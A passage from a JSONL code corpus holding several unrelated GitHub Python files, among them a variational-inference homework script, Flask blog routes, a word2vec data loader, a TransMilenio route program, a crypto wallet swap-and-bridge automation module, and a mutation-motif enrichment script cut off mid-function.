print(samples_mean_slope)\n # print(samples_mean_bias)\n\n # # Task 3\n # graph_3 = daphne(['graph','-i','/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_4/programs/{}.daphne'.format(3)])\n # print('\\n\\n\\nSample of posterior of program {}:'.format(3)) \n # T_3 = int(2 * 1e3)\n # L_3 = 50\n # start_time_3 = time.time()\n # samples_3, log_weights_3, posteriors_3 = BBVI(graph_3, T_3, L_3)\n # print('Time taken:', time.time() - start_time_3)\n # samples_3 = torch.stack(samples_3).numpy()\n # weights_3 = np.exp(torch.stack(log_weights_3).detach().numpy())\n \n # samples_mean = (samples_3 * weights_3.reshape(-1,1)).sum(axis=0) / weights_3.sum()\n \n # print(samples_mean)\n\n # Task 4\n # graph_4 = daphne(['graph','-i','/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_4/programs/{}.daphne'.format(4)])\n # print('\\n\\n\\nSample of posterior of program {}:'.format(4)) \n # T_4 = int(2 * 1e2)\n # L_4 = 50\n # start_time_4 = time.time()\n # samples_4, log_weights_4, posteriors_4 = BBVI(graph_4, T_4, L_4)\n # print('Time taken:', time.time() - start_time_4)\n # w_0 = np.zeros((10,1))\n # b_0 = np.zeros((10,1))\n # w_1 = np.zeros((10,10))\n # b_1 = np.zeros((10,1))\n\n # weights = np.exp(torch.stack(log_weights_4).detach().numpy())\n # for i, sample in enumerate(samples_4):\n # w_0 += sample[0].numpy() * weights[i]\n # b_0 += sample[1].numpy() * weights[i]\n # w_1 += sample[2].numpy() * weights[i]\n # b_1 += sample[3].numpy() * weights[i]\n\n # sum_weights = weights.sum()\n\n # w_0 /= sum_weights\n # b_0 /= sum_weights\n # w_1 /= sum_weights\n # b_1 /= sum_weights\n\n # draw_hitmap('BBVI', w_0, '4_w0')\n # draw_hitmap('BBVI', b_0, '4_b0')\n # draw_hitmap('BBVI', w_1, '4_w1')\n # draw_hitmap('BBVI', b_1, '4_b1')\n\n\n # Task 5\n graph_5 = daphne(['graph','-i','/Users/aliseyfi/Documents/UBC/Semester3/Probabilistic-Programming/HW/Probabilistic-Programming/Assignment_4/programs/{}.daphne'.format(5)])\n print('\\n\\n\\nSample of posterior of program {}:'.format(5))\n T_5 = int(2 * 1e3)\n L_5 = 25\n start_time_5 = time.time()\n samples_5, log_weights_5, posteriors_5 = BBVI(graph_5, T_5, L_5)\n print('Time taken:', time.time() - start_time_5)\n\n print(posteriors_5[-1]['sample2'])\n new_samples = torch.distributions.Uniform(*posteriors_5[-1]['sample2']).sample((10000,)).view(1,-1)\n draw_hists('BBVI', new_samples, 5)","repo_name":"aliseyfi75/Probabilistic-Programming","sub_path":"Assignment_4/graph_based_sampling.py","file_name":"graph_based_sampling.py","file_ext":"py","file_size_in_byte":20920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35566306940","text":"from routes import *\nfrom models.blog import \\\n Blog, Comment\nfrom models.node import Node\n\n\nmain = Blueprint('blog', __name__)\n\n\ndef data_time():\n format = '%H:%M:%S'\n value = time.localtime(int(time.time()))\n dt = time.strftime(format, value)\n return dt\n\n\n\n@main.route('/')\ndef index():\n '''\n 根据用户点击的节点来显示 博客\n 默认为所有\n 1.得到所有的node节点\n 2.根据节点返回响应的数据\n '''\n ns = Node.query.all()\n form = request.args\n bid = form.get('board_id', None)\n if bid is not None:\n # bs = Blog.query.filter_by(board_id=bid).all()\n node = Node.query.get(bid)\n log('node: ', node)\n bs = node.node_blog\n log('blog index user img:and blog:{}'.format(bs))\n return render_template('blog_index.html', nodes=ns, blog=bs)\n else:\n bs = Blog.query.all()\n return render_template('blog_index.html', blog=bs, nodes=ns)\n\n\n@main.route('/detail/')\ndef detail(id):\n u = current_user()\n ms = Blog.query.get(id)\n cm = ms.comments\n log('所有的评论,', cm)\n return render_template('blog_detail.html', b=ms, user=u, comment=cm)\n\n\n@main.route('/new')\n@login_required\ndef new():\n u = current_user()\n log('发表新微薄', u.id, u.username )\n # 得到所有的board_id\n bid = Node.query.all()\n log('发表新微博board_id', bid)\n return render_template('blog_new.html', user=u, board=bid)\n\n\n@main.route('/add', methods=['post'])\ndef add():\n form = request.form\n log('blog add form.get(parent_id)', form.get('user_img', 0))\n Blog.new(form)\n return redirect(url_for('.index'))\n\n\n@main.route('/delete/')\ndef delete(id):\n print('delete id', id)\n Blog.delete(id)\n return redirect(url_for('.index'))\n\n\n@main.route('/comment/fa', methods=['post'])\n@login_required\ndef comment_fa():\n form = request.form\n log('comment fa', form)\n bid = form.get('blog_id', -1)\n blog = Blog.query.get(bid)\n blog.comment_len()\n Comment.new(form)\n return redirect('/detail/{}'.format(bid))","repo_name":"Ak46/bbs","sub_path":"routes/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43395522346","text":"from torch.utils.data import Dataset, DataLoader\nimport collections\nimport random\nimport math\nimport numpy as np\n\n\nclass PTBDataSet(Dataset):\n def __init__(self, count_least=5, t=1e-4, max_window_size=5, negative_sampling_num=5):\n \"\"\"\n :param count_least: 为了计算简单,只保留在数据集中至少出现count_least次的词。\n :param t: 二次采样\n :param max_window_size: 最大背景窗口\n :param negative_sampling_num: 对于一对中心词和背景词,随机采样 K 个噪声词\n \"\"\"\n super(PTBDataSet, self).__init__()\n\n self.count_least = count_least\n self.t = t\n self.max_window_size = max_window_size\n self.negative_sampling_num = negative_sampling_num\n\n self.counter, self.index_to_token, self.token_to_index, self.dataset = self.load_text()\n self.centers, self.contexts_negatives, self.masks, self.labels = self.data_prepare()\n print(self.centers.shape, self.contexts_negatives.shape, self.masks.shape, self.labels.shape)\n\n def get_token_num(self):\n return len(self.index_to_token)\n\n def __len__(self):\n return self.centers.shape[0]\n\n def __getitem__(self, index):\n return [self.centers[index], self.contexts_negatives[index], self.masks[index], self.labels[index]]\n\n def load_text(self):\n with open('./data/ptb.train.txt', 'r') as f:\n text = f.readlines()\n raw_dataset = [sentence.split() for sentence in text]\n counter = collections.Counter([token for sentence in raw_dataset for token in sentence])\n # counter: {token: number_of_token}\n counter = dict(filter(lambda x: x[1] >= self.count_least, counter.items()))\n # index_to_token: [token1, token2, ..., tokenN]\n index_to_token = list(counter.keys())\n # token_to_index: {token: token_index}\n token_to_index = {token: index for index, token in enumerate(counter)}\n \"\"\"\n dataset: [[sentence1],\n [sentence2],\n ...\n [sentenceN]]\n all tokens in sentences are numbers(indices)\n \"\"\"\n dataset = [[token_to_index[token] for token in sentence if token in token_to_index] for sentence in\n raw_dataset]\n return counter, index_to_token, token_to_index, dataset\n\n def data_prepare(self):\n\n token_num = sum([len(sentence) for sentence in self.dataset])\n sub_dataset = [\n [token for token in sentence if not self.discard(token, token_num)] for\n sentence in self.dataset]\n print('token in sub_dataset', sum([len(sentence) for sentence in sub_dataset]))\n \"\"\"\n all_centers: [center1, center2, ..., centerN]\n all_contexts: [[contexts1],\n [contexts2],\n ...\n [contextsN]]\n \"\"\"\n all_centers, all_contexts = self.get_centers_contexts(sub_dataset, self.max_window_size)\n sampling_weights = [self.counter[token] ** 0.75 for token in self.token_to_index]\n \"\"\"\n all_negatives: [[negative1],\n [negative2],\n ...\n [negativeN]]\n \"\"\"\n all_negatives = self.get_negatives(all_contexts, sampling_weights, self.negative_sampling_num)\n return self.padding(all_centers=all_centers, all_contexts=all_contexts, all_negatives=all_negatives)\n # return all_centers, all_contexts, all_negatives\n # return np.array(all_centers), np.array(all_contexts), np.array(all_negatives)\n\n def discard(self, token_index, token_num):\n return random.uniform(0, 1) < max(\n [0, 1 - math.sqrt(self.t / (self.counter[self.index_to_token[token_index]] / token_num))])\n\n def get_centers_contexts(self, dataset, max_window_size):\n centers, contexts = [], []\n for sentence in dataset:\n if len(sentence) < 2:\n continue\n centers += sentence\n for center_word_index in range(len(sentence)):\n # [1, max_window_size]\n window_size = random.randint(1, max_window_size)\n # [center_word - window_size, center_word + window_size]\n indices = list(\n range(max([0, center_word_index - window_size]),\n min([len(sentence), center_word_index + window_size + 1])))\n indices.remove(center_word_index)\n contexts.append([sentence[i] for i in indices])\n return centers, contexts\n\n def get_negatives(self, all_contexts, sampling_weights, K):\n \"\"\"\n 我们使用负采样来进行近似训练。对于一对中心词和背景词,我们随机采样 K 个噪声词(实验中设 K=5 )。\n 根据word2vec论文的建议,噪声词采样概率 P(w) 设为 w 词频与总词频之比的0.75次方\n :param all_contexts: 正样本\n :param sampling_weights: 采样概率\n :param K: K个噪声词\n :return:\n \"\"\"\n all_negatives, neg_candidates, i = [], [], 0\n population = list(range(len(sampling_weights)))\n for context in all_contexts:\n negatives = []\n while len(negatives) < K * len(context):\n if i == len(neg_candidates):\n i = 0\n neg_candidates = random.choices(population=population, weights=sampling_weights, k=int(1e5))\n neg, i = neg_candidates[i], i + 1\n if neg not in set(context):\n negatives += [neg]\n all_negatives.append(negatives)\n return all_negatives\n\n def padding(self, all_centers, all_contexts, all_negatives):\n \"\"\"\n 填充每一个训练样本\n :param all_centers:\n :param all_contexts:\n :param all_negatives:\n :return: centers: 样本中心词,shape: (centers,)\n contexts_negatives:样本背景词与噪声词,shape: (centers, max_len)\n masks:1 => 不是填充项;0 => 填充项, shape: (centers, max_len)\n labels:1 => 正样本(背景词);0 => 负样本(噪声词),shape: (centers, max_len)\n \"\"\"\n max_len = self.max_window_size * 2 + self.max_window_size * 2 * self.negative_sampling_num\n centers, contexts_negatives, masks, labels = [], [], [], []\n for center, context, negative in zip(all_centers, all_contexts, all_negatives):\n cur_len = len(context) + len(negative)\n centers.append(center)\n contexts_negatives += [context + negative + [0] * (max_len - cur_len)]\n masks += [cur_len * [1] + (max_len - cur_len) * [0]]\n labels += [len(context) * [1] + (max_len - len(context)) * [0]]\n return np.array(centers), np.array(contexts_negatives), np.array(masks), np.array(labels)\n\n\nif __name__ == '__main__':\n train_set = PTBDataSet()\n train_loader = DataLoader(train_set, batch_size=512, shuffle=True)\n for batch_idx, (center, context_negative, mask, label) in enumerate(train_loader):\n print('center', center.shape)\n print('context_nagative', context_negative.shape)\n print('mask', mask.shape)\n print('label', label.shape)\n break\n","repo_name":"toooooodo/pytorch-word2vec","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":7328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"71017050078","text":"from manejarJSON import *\nfrom manejarJSON_UPZ import *\n\ndef main():\n print(\"\\033[3;35m\" + \" BIENVENIDO PROGRAMA ESTACIONES TRANSMILENIO\")\n\n\n objetoJSON = ManejarJSON()\n print(\"\\033[1;37m | \" + \"Actualmente solo tenemos conexion entre las siguientes troncales: \")\n objetoJSON.leerRutas()\n objetoJSON.imprimirRutas()\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n rutaElegida = int(input(\"\\033[1;33m\" + \"Digite el numero de la ruta: \"))\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n objetoJSON.leerRuta(rutaElegida)\n objetoJSON.imprimirRuta()\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n direccionElegida = input(\"\\033[1;33m\" + \"Digite el numero de la direccion en que va: \")\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n troncalLetraOrigen = objetoJSON.obtenerTroncalOrigen(direccionElegida)\n troncalLetraDestino = objetoJSON.obtenerTroncalDestino(direccionElegida)\n objetoJSON.leerEstaciones(troncalLetraOrigen)\n objetoJSON.imprimirEstaciones()\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n estacionNumeroOrigen = int(input(\"\\033[1;33m\" + \"Digite el # de la estacion de origen donde se encuentra: \"))\n estacionNombreOrigen = objetoJSON.imprimirEstacion(estacionNumeroOrigen)\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n objetoJSON.leerEstaciones(troncalLetraDestino)\n objetoJSON.imprimirEstaciones()\n print(\"\\033[1;33m\" + \"------------------------------------------------------------\")\n estacionNumeroDestino = int(input(\"\\033[1;33m\" + \"Digite el # de la estacion de la estacion de destino: \"))\n estacionNombreDestino = objetoJSON.imprimirEstacion(estacionNumeroDestino)\n print(\"\\033[1;33m\" + \"------------------------------------------------------------\")\n tuplaViaje = (estacionNumeroOrigen, estacionNumeroDestino, direccionElegida)\n\n print()\n print(\"\\033[2;36m\" + \"Ud. viaja de la estacion \" + estacionNombreOrigen + \" a la estacion \" + estacionNombreDestino)\n print(\"\\033[6;34m\" + \"*** Iniciando trayecto...\")\n objetoJSON.cargarListaEstaciones(troncalLetraOrigen, troncalLetraDestino, tuplaViaje)\n\n\n objetoUPZ = manejarJSON_UPZ()\n tabla_Hash = objetoUPZ.leerUPZ()\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n UPZElegida = int(input(\"\\033[1;33m\" + \"Digite el numero de la UPZ: \"))\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n objetoUPZ.buscarUPZ(UPZElegida, tabla_Hash)\n objetoJSON.leerTroncales()\nmain()","repo_name":"jducuara42/estructurasDeDatos","sub_path":"Proyecto2/principal.py","file_name":"principal.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35046408025","text":"import random\n\nfrom config import ETH_PRICE, TOKENS_PER_CHAIN, LAYERZERO_WRAPED_NETWORKS, LAYERZERO_NETWORKS_DATA, \\\n TOKENS_PER_CHAIN2\nfrom modules import Logger, Aggregator\nfrom settings import GLOBAL_NETWORK, OKX_BALANCE_WANTED, AMOUNT_PERCENT, STARGATE_CHAINS, STARGATE_TOKENS, \\\n MEMCOIN_AMOUNT\nfrom utils.tools import helper, gas_checker\n\n\nclass Custom(Logger, Aggregator):\n def __init__(self, client):\n Logger.__init__(self)\n Aggregator.__init__(self, client)\n\n async def swap(self):\n pass\n\n async def collect_eth_util(self):\n from functions import swap_odos, swap_oneinch, swap_openocean, swap_xyfinance, swap_rango, swap_avnu\n\n self.logger_msg(*self.client.acc_info, msg=f\"Stark collecting tokens to ETH\")\n\n func = {\n 3: [swap_odos, swap_oneinch, swap_openocean, swap_xyfinance],\n 4: [swap_rango, swap_openocean, swap_xyfinance],\n 8: [swap_openocean, swap_xyfinance],\n 9: [swap_avnu],\n 11: [swap_openocean, swap_xyfinance, swap_odos, swap_oneinch]\n }[GLOBAL_NETWORK]\n\n wallet_balance = {k: await self.client.get_token_balance(k, False)\n for k, v in TOKENS_PER_CHAIN[self.client.network.name].items()}\n valid_wallet_balance = {k: v[1] for k, v in wallet_balance.items() if v[0] != 0}\n eth_price = ETH_PRICE\n\n if 'ETH' in valid_wallet_balance:\n valid_wallet_balance['ETH'] = valid_wallet_balance['ETH'] * eth_price\n\n if len(valid_wallet_balance.values()) > 1:\n\n for token_name, token_balance in valid_wallet_balance.items():\n if token_name != 'ETH':\n amount_in_wei = wallet_balance[token_name][0]\n amount = float(f\"{(amount_in_wei / 10 ** await self.client.get_decimals(token_name)):.6f}\")\n amount_in_usd = valid_wallet_balance[token_name]\n if amount_in_usd > 1:\n from_token_name, to_token_name = token_name, 'ETH'\n data = from_token_name, to_token_name, amount, amount_in_wei\n counter = 0\n while True:\n result = False\n module_func = random.choice(func)\n try:\n self.logger_msg(*self.client.acc_info, msg=f'Launching swap module', type_msg='warning')\n result = await module_func(self.client.account_name, self.client.private_key,\n self.client.network, self.client.proxy_init, swapdata=data)\n except:\n counter += 1\n pass\n if result or counter == 3:\n break\n else:\n self.logger_msg(*self.client.acc_info, msg=f\"{token_name} balance < 1$\")\n\n return True\n else:\n raise RuntimeError('Account balance already in ETH!')\n\n @helper\n @gas_checker\n async def collect_eth(self):\n await self.collect_eth_util()\n\n @helper\n @gas_checker\n async def balance_average(self):\n from functions import okx_withdraw\n\n self.logger_msg(*self.client.acc_info, msg=f\"Stark check all balance to make average\")\n\n amount = OKX_BALANCE_WANTED\n wanted_amount_in_usd = float(f'{amount * ETH_PRICE:.2f}')\n\n wallet_balance = {k: await self.client.get_token_balance(k, False)\n for k, v in TOKENS_PER_CHAIN[self.client.network.name].items()}\n valid_wallet_balance = {k: v[1] for k, v in wallet_balance.items() if v[0] != 0}\n eth_price = ETH_PRICE\n\n if 'ETH' in valid_wallet_balance:\n valid_wallet_balance['ETH'] = valid_wallet_balance['ETH'] * eth_price\n\n valid_wallet_balance = {k: round(v, 7) for k, v in valid_wallet_balance.items()}\n\n sum_balance_in_usd = sum(valid_wallet_balance.values())\n\n if wanted_amount_in_usd > sum_balance_in_usd:\n need_to_withdraw = float(f\"{(wanted_amount_in_usd - sum_balance_in_usd) / eth_price:.6f}\")\n\n self.logger_msg(*self.client.acc_info, msg=f\"Not enough balance on account, start OKX withdraw module\")\n\n return await okx_withdraw(self.client.account_name, self.client.private_key, self.client.network,\n self.client.proxy_init, want_balance=need_to_withdraw)\n raise RuntimeError('Account has enough tokens on balance!')\n\n @helper\n @gas_checker\n async def wraps_abuser(self):\n from functions import swap_odos, swap_oneinch, swap_xyfinance, swap_avnu\n\n func = {\n 3: [swap_odos, swap_oneinch, swap_xyfinance],\n 4: [swap_xyfinance],\n 8: [swap_xyfinance],\n 9: [swap_avnu],\n 11: [swap_odos, swap_oneinch, swap_xyfinance]\n }[GLOBAL_NETWORK]\n\n current_tokens = list(TOKENS_PER_CHAIN[self.client.network.name].items())[:2]\n\n wallet_balance = {k: await self.client.get_token_balance(k, False) for k, v in current_tokens}\n valid_wallet_balance = {k: v[1] for k, v in wallet_balance.items() if v[0] != 0}\n eth_price = ETH_PRICE\n\n if 'ETH' in valid_wallet_balance:\n valid_wallet_balance['ETH'] = valid_wallet_balance['ETH'] * eth_price\n\n if 'WETH' in valid_wallet_balance:\n valid_wallet_balance['WETH'] = valid_wallet_balance['WETH'] * eth_price\n\n max_token = max(valid_wallet_balance, key=lambda x: valid_wallet_balance[x])\n percent = round(random.uniform(*AMOUNT_PERCENT), 9) / 100 if max_token == 'ETH' else 1\n amount_in_wei = int(wallet_balance[max_token][0] * percent)\n amount = float(f\"{amount_in_wei / 10 ** 18:.6f}\")\n\n if max_token == 'ETH':\n msg = f'Wrap {amount:.6f} ETH'\n from_token_name, to_token_name = 'ETH', 'WETH'\n else:\n msg = f'Unwrap {amount:.6f} WETH'\n from_token_name, to_token_name = 'WETH', 'ETH'\n\n self.logger_msg(*self.client.acc_info, msg=msg)\n\n if (max_token == 'ETH' and valid_wallet_balance[max_token] > 1\n or max_token == 'WETH' and valid_wallet_balance[max_token] != 0):\n data = from_token_name, to_token_name, amount, amount_in_wei\n counter = 0\n result = False\n while True:\n module_func = random.choice(func)\n try:\n result = await module_func(self.client.account_name, self.client.private_key,\n self.client.network, self.client.proxy_init, swapdata=data)\n\n except:\n pass\n if result or counter == 3:\n break\n\n return result\n else:\n self.logger_msg(*self.client.acc_info, msg=f\"{from_token_name} balance is too low (lower 1$)\")\n\n async def smart_swap_stargate(self):\n from functions import swap_stargate\n\n chain1, chain2 = STARGATE_CHAINS\n token1, token2 = STARGATE_TOKENS\n rpc_by_id = LAYERZERO_WRAPED_NETWORKS\n\n client_chain1 = await self.client.new_client(rpc_by_id[chain1])\n client_chain2 = await self.client.new_client(rpc_by_id[chain2])\n\n balance_chain1, _, _ = await client_chain1.get_token_balance(omnicheck=True, token_name=token1,\n check_symbol=False)\n balance_chain2, _, _ = await client_chain2.get_token_balance(omnicheck=True, token_name=token2,\n check_symbol=False)\n\n if balance_chain2 == 0 and balance_chain1 == 0:\n raise RuntimeError('Insufficient balances on both networks!')\n elif balance_chain2 > balance_chain1:\n current_client = client_chain2\n from_token_name, to_token_name = token2, token1\n amount_in_wei = balance_chain2 if from_token_name != 'ETH' else await client_chain2.client.get_smart_amount()\n src_chain_name, dst_chain_name = client_chain2.network.name, client_chain1.network.name\n dst_chain_id = LAYERZERO_NETWORKS_DATA[chain1][1]\n contract = client_chain2.get_contract(TOKENS_PER_CHAIN2[client_chain2.network.name][from_token_name])\n decimals = await contract.functions.decimals().call()\n else:\n current_client = client_chain1\n from_token_name, to_token_name = token1, token2\n amount_in_wei = balance_chain1 if from_token_name != 'ETH' else await client_chain1.client.get_smart_amount()\n src_chain_name, dst_chain_name = client_chain1.network.name, client_chain2.network.name\n dst_chain_id = LAYERZERO_NETWORKS_DATA[chain2][1]\n contract = client_chain1.get_contract(TOKENS_PER_CHAIN2[client_chain1.network.name][from_token_name])\n decimals = await contract.functions.decimals().call()\n\n amount = f\"{amount_in_wei / 10 ** decimals:.3f}\"\n\n swapdata = dst_chain_id, dst_chain_name, src_chain_name, from_token_name, to_token_name, amount, amount_in_wei\n\n return await swap_stargate(current_client, swapdata=swapdata)\n\n @helper\n async def mint_token_avnu(self):\n from functions import swap_avnu\n\n amount, amount_in_wei = MEMCOIN_AMOUNT, int(MEMCOIN_AMOUNT * 10 ** 18)\n data = 'ETH', 'MEMCOIN', amount, amount_in_wei\n\n return await swap_avnu(self.client.account_name, self.client.private_key,\n self.client.network, self.client.proxy_init, swapdata=data)\n\n @helper\n async def mint_token_jediswap(self):\n from functions import swap_jediswap\n\n amount, amount_in_wei = MEMCOIN_AMOUNT, int(MEMCOIN_AMOUNT * 10 ** 18)\n data = 'ETH', 'MEMCOIN', amount, amount_in_wei\n\n return await swap_jediswap(self.client.account_name, self.client.private_key,\n self.client.network, self.client.proxy_init, swapdata=data)\n\n","repo_name":"realaskaer/AttackMachine","sub_path":"modules/others/cutsom_module.py","file_name":"cutsom_module.py","file_ext":"py","file_size_in_byte":10203,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"51"} +{"seq_id":"4255527395","text":"# Se crean los diccionarios para cada persona\npersona1 = {\"nombre\": \"Juan\", \"apellido\": \"Pérez\", \"telefono\": \"90909090\"}\npersona2 = {\"nombre\": \"María\", \"apellido\": \"González\", \"telefono\": \"80808080\"}\npersona3 = {\"nombre\": \"Pedro\", \"apellido\": \"Rodríguez\", \"telefono\": \"70707070\"}\n\n# Creamos una lista para almacenar los diccionarios\nlista_personas = [persona1, persona2, persona3]\n\n# Se imprime la lista de personas\nprint(lista_personas)\n\n","repo_name":"waldaldo/Python","sub_path":"4.- S4/DRILLING/drilling.py","file_name":"drilling.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10702080108","text":"arr = [1,2,3,4,5]\ngive_one = [1,2,3,4,5]\n\ngive_two = [2, 1, 2, 3, 2, 4, 2, 5]\n\ngive_three = [3, 3, 1, 1, 2, 2, 4, 4, 5, 5]\n\nanswer_count = [0,0,0]\nanswer_result = []\nfor i,value in enumerate(arr):\n\n if value == give_one[i%len(give_one)]:\n answer_count[0] += 1\n if value == give_two[i%len(give_two)]:\n answer_count[1] += 1\n if value == give_three[i%len(give_three)]:\n answer_count[2] += 1\n\nfor index,k in enumerate(answer_count):\n if k == max(answer_count):\n answer_result.append(index+1)\nprint(answer_result)\n# if one_count>=1 and two_count>=1 and three_count>=1:\n# if (one_count == two_count == three_count):\n# print([1,2,3])\n# elif(two_count == three_count):\n# print([2, 3])\n# elif(one_count == two_count):\n# print([1, 2])\n# elif(one_count == three_count):\n# print([1,3])\n# else:\n# result_arr =[]\n# if max(one_count,two_count,three_count) == one_count:\n# print([1])\n# elif max(one_count,two_count,three_count) == two_count:\n# print([2])\n# elif max(one_count,two_count,three_count) == three_count:\n# print([3])","repo_name":"hyunseungbin9408/Python","sub_path":"algorithm/Level_1/mock_test.py","file_name":"mock_test.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41477248504","text":"#!/usr/bin/env python\n\n# DESCRIPTION\n# Checks for evidence of mutations at a given motif, as well as a designated position in the motif\n#\n# After obtaining the sequences for each region of interest, all 4 possible orientations of the input\n# motif is generated. The locations of the motif in each region are then identified.\n# The number of mutations overlapping the motif are then calculated, as well as the number of mutations\n# overlapping the position of interest\n# The probability of mutation enrichment/derichment is the calculated using a fisher's exact test:\n#\n# Probability of mutation enrichment/derichment for motif:\n# Number of mutations overlapping motif, Total lengths of motifs\n# Number of mutations in gene, Gene length\n#\n# Probability of mutation enrichment/derichment for motif:\n# Number of mutations overlapping position in motif, Total number of positions cross all motifs\n# Number of mutations overlapping position gene-wide, Total number of positions across region\n#\n# AUTHOR\n# Christopher Rushton\n#\n\nimport argparse\nimport os\nimport pyfaidx\nimport sys\nimport re\nfrom scipy.stats import binom_test, fisher_exact\n\ndef isValidFile(file, parser):\n\t\"\"\"\n\tEnsures that the specified file-path actually exists\n\t\"\"\"\n\tif not os.path.exists(file):\n\t\traise parser.error(\"Unable to locate \\\"%s\\\": No such file or directory\" % file)\n\telse:\n\t\treturn file\n\n\ndef getArgs():\n\t\"\"\"\n\tProcesses command line arguments\n\t\"\"\"\n\tparser = argparse.ArgumentParser(description=\"Checks for enrichment of mutations at a given motif/site in a motif\")\n\n\tparser.add_argument(\"-m\", \"--maf_file\", metavar=\"MAF\", required=True, type=lambda x: isValidFile(x, parser),\n\t\t\t\t\t\thelp=\"Input MAF file, listing mutations in the regions of interest\")\n\tparser.add_argument(\"-r\", \"-f\", \"--reference\", metavar=\"FASTA\", required=True, type=lambda x: isValidFile(x, parser),\n\t\t\t\t\t\thelp=\"Reference genome, in FASTA format\")\n\tparser.add_argument(\"-t\", \"--targets\", metavar=\"BED\", required=True, type=lambda x: isValidFile(x, parser),\n\t\t\t\t\t\thelp=\"A BED3 file (or better) listing the regions of interest\")\n\tparser.add_argument(\"-s\", \"--signature\", metavar=\"AATYG\", required=True, help=\"Mutation signature sequence\")\n\tparser.add_argument(\"-i\", \"--index\", metavar=\"1\", required=True, type=int, help=\"1-based index of the position of interest in the mutation signature\")\n\tparser.add_argument(\"-o\", \"--output\", metavar=\"TSV\", required=False, default=sys.stdout, help=\"Output file to write summary report. [default: stdout]\")\n\tparser.add_argument(\"--method\", metavar=\"STATS\", choices=[\"fisher_exact\", \"binomial_exact\"], default=\"binomial_exact\",\n\t\t\t\t\t\thelp=\"Method to use to test for increased/decreased frequency of mutations [default: %(default)s]\")\n\tparser.add_argument(\"--annotate_maf\", metavar=\"MAF\", required=False, help=\"Output MAF file listing all mutations, and if they overlap the signature or site of interest\")\n\targs = parser.parse_args()\n\n\t# Sanity checks\n\tif args.index <= 0 or args.index > len(args.signature):\n\t\tparser.error(\"\\'-i/--index\\' must be a 1-based index corresponding to the position in the \\'-s/--signature\\' of interest\")\n\n\treturn args\n\n\ndef loadGeneSequences(targetFile, refFile):\n\t\"\"\"\n\tObtain the DNA sequences of each region provided\n\n\t:args targetFile: A BED3 file (or better) listing the regions of interest\n\t:args refFile: A file-path to a FASTA file corresponding to the reference genome\n\t\"\"\"\n\n\t# Load targets\n\ttargetSeq = {}\n\tgeneNames = {}\n\n\t# Load the reference genome\n\trefGenome = pyfaidx.Fasta(refFile)\n\n\twith open(targetFile) as f:\n\t\t\tfor line in f:\n\t\t\t\tline = line.rstrip()\n\t\t\t\t# Obtain genomic coordinates\n\t\t\t\ttry:\n\t\t\t\t\tcols = line.split(\"\\t\")\n\t\t\t\t\tchrom, start, end = cols[0:3]\n\n\t\t\t\t\t# Generate a unique ID which will be used to identify this sequence\n\t\t\t\t\tidName = chrom + \":\" + start + \"-\" + end\n\n\t\t\t\t\tstart = int(start) # Account for 1-based indexing\n\t\t\t\t\tend = int(end)\n\n\t\t\t\texcept IndexError: # This record is malformed or missing. Don't process it\n\t\t\t\t\tsys.stderr.write(\"WARNING: BED entry \\'\" + line + \"\\' appears malformed. Ignoring...\")\n\n\t\t\t\t# Parse the gene name (if present)\n\t\t\t\ttry:\n\t\t\t\t\tgeneName = cols[3]\n\t\t\t\texcept IndexError:\n\t\t\t\t\t# Use the position as a replacement ID\n\t\t\t\t\tgeneName = idName\n\n\t\t\t\t# Obtain the DNA sequence for this gene\n\t\t\t\tgeneSeq = refGenome[chrom][start:end].seq\n\n\t\t\t\t# Sanity check: If this region already exists (i.e. it was specified in the BED file multiple times)\n\t\t\t\t# inform the user\n\t\t\t\tif idName in targetSeq:\n\t\t\t\t\tsys.stderr.write(\"WARNING: BED entry \\'\" + line + \"\\' appears to be a duplicate. Ignoring...\")\n\t\t\t\telse:\n\t\t\t\t\tgeneNames[idName] = geneName\n\t\t\t\t\ttargetSeq[idName] = geneSeq\n\n\treturn targetSeq, geneNames\n\n\ndef loadMutations(mafFile):\n\t\"\"\"\n\tStores the position of mutations from an input file in a dictionary\n\n\t:param mafFile: A string containing a file-path to the input file\n\t:return: A dictionary storing chrom: [mutation1, mutation2] (sorted)\n\t\"\"\"\n\n\tmutations = {}\n\tsamples = set()\n\twith open(mafFile) as f:\n\t\tfor line in f:\n\t\t\t# Skip header lines\n\t\t\tif line.startswith(\"#\") or line.startswith(\"Hugo_Symbol\"):\n\t\t\t\tcontinue\n\n\t\t\t# Parse the chromosome and position of each mutation\n\t\t\ttry:\n\t\t\t\tcols = line.split(\"\\t\")\n\t\t\t\tchrom = cols[4]\n\t\t\t\tposition = int(cols[5]) - 1\n\t\t\t\tsample = cols[15]\n\t\t\texcept (IndexError, TypeError):\n\t\t\t\traise TypeError(\"Unable to parse input MAF file. It may be malformed.\")\n\t\t\tif chrom not in mutations:\n\t\t\t\tmutations[chrom] = []\n\t\t\tmutations[chrom].append(position)\n\n\t\t\t# Add the sample\n\t\t\tif sample not in samples:\n\t\t\t\tsamples.add(sample)\n\n\tfor chrom, positions in mutations.items():\n\t\tmutations[chrom] = 